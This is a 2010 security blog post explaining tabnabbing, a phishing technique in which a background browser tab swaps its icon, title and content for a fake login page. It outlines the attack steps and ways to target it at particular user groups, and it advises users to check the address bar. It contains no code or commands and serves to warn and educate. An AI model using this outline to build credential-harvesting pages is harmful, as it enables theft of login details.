Sécurité Proactive
 

A cunning new phishing technique - Tabnabbing

2010-05-27 [Problèmes de confidentialité, Lexique de la securité, Ingénerie sociale, Tendances et prévisions]

Introduction

Over the years new ingenious words for security issues have come up. We have seen the neologisms pharming, vishing, clickjacking and slurping, just to mention some. This week a new one was born - tabnabbing. Which turns out to be more scary than most. 

Safer browsing: Do not click on links in emails

One of the more popular advices regarding how to perform safe browsing is to avoid clicking on links in emails. The recommended action is to either type the address into your browser, or (smoother) to copy the URL text into your browser. The reason why is of course that the linked-to Internet address may be completely different than what is written as the URL.
Check the following example: Clicking the link www.google.com does not take you to Google's home page, rather to Norman's home page. You can see the real linked-to address by hovering the mouse pointer over the link.

In a blog posting recently a new type of attack - slightly related - was introduced.

The tabnabbing phishing attack

The term tabnabbing was introduced in a blog posting from Aza Raskin, creative lead of Firefox, one of the most used browsers.

In short the attack functions like this:

  1. A user enters a web page that has implemented a tabnabbing attack.
    To trick a user into navigating to such a page, several common social engineering techniques may be used, or the attacker may have access to legitimate web sites by means of any kind of exploit.
  2. Whenever the browser loses its focus on that web page (either by switching to another browser tab, or to another application), a tabnabbing javascript on the web page performs the following actions:
    • It replaces the page's icon (the favicon.ico image) with an icon of the attacker's choice.
    • It changes the browser tab's title with a title of the attacker's choice.
    • it changes the page's content with content of the attacker's choice
  3. When the user navigates back to the original browser tab (which is now changed), he may easily be tricked to perform actions that may reveal critical personal information, for example his login information to a protected web resource.

In the proof-of-concept from Raskin's blog, this was exemplified by changing his blog posting into Google Gmail's login page (see image at the end of this article).

Note that this type of attack is not limited to Firefox browser. Other browsers are also in varying degree vulnerable to this attack. One researcher even showed how a variant of the attack can be performed without using javascript at all. See the Update 25 May at the end of this blog posting from Krebson Security.

The new thing about this attack is that it does not depend on tricking the user by displaying a bogus web page in the first place. Instead it changes the web page - and the corresponding browser tab - when the user is occupied elsewhere. Our mental defenses are not set up to protect against this type of attacks.

Targeting the attacks

An attack of this type will be much more effective if it is refined and targeted. The clever cyber criminal will then be able to fine-tune her attack to fit a group with particular characteristics.

Checking login information

There are ways to find out whether the user is logged into certain web sites.

By displaying a fake login information using the technique described above, the attacker will trick the user to re-enter his login. The attacker will harvest this information for her further use, and reload the original logged-in information (since the user was logged in already in the first place). Thus the unsuspecting user will not have noticed anything except that he experienced an unexpected logged-out situation (which unfortunately happens occasionally as we all know).

The attacker can then calmly use her obtained credentials to perform her evil deed whatever that might be.

Targeting specific users

Obviously it will not function to display a login page to an application of which a user is unfamiliar. Even the most trusting user will wonder if he suddenly sees a login page to a netbank he has never used.

The attack may therefore be further refined by targeting a particular group of users that the attacker knows to be users of a particular application. This may for example be a login page to an organization's intranet. Or a set of users that all use a particular netbank.

Such a targeted attack requires some investigation and work before performing the attack itself. The potential for success, however is probably quite good.

Expectations

Attacks of the types described here are frighteningly easy to perform in their simplest form. Thus real attacks can be expected to emerge soon.

As of yet the best advice for users to avoid falling victims to such an attack is to check the URL in the address bar (usually at the top of the browser) and not depend on information shown in the icon and text on the tab. See image below:

Click image to enlarge

It will be interesting to see how the developers of the different browsers react to this threat in newer browser versions/updates.

References